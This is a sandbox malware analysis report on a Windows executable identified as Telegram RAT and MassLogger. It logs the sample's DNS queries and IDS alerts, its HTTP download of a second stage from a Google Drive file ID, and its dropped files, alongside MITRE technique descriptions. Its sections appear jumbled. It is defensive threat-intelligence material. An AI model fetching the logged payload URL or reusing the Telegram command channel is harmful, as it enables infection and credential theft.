Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 4x nop then push 00000000h	3_2_3627E7C8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	3_2_3627F5D8
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 4x nop then push 00000000h	3_2_3627F316

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49973 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49910 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49869 -> 142.250.186.142:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report b5BQbAhwVD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Iw\14-scaled.jpg

C:\Users\user\AppData\Local\Iw\Brassware.ove

C:\Users\user\AppData\Local\Iw\Holomyarii.Reg

C:\Users\user\AppData\Local\Iw\Kbmandsskole.str

C:\Users\user\AppData\Local\Iw\Sensuousnesses.opk

C:\Users\user\AppData\Local\Iw\prepares.pli

C:\Users\user\AppData\Local\Temp\nss447F.tmp

C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll

Static File Info

General

File Icon

Windows Analysis Report
b5BQbAhwVD.exe

Function 004034A5 Relevance: 84.4, APIs: 32, Strings: 16, Instructions: 410
stringfilecomCOMMON

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00405AFA Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403AD8 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402F30 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203
memoryCOMMON

Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405F0D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 72ED1777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00402032 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
libraryCOMMON

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 00401B77 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72
memoryCOMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre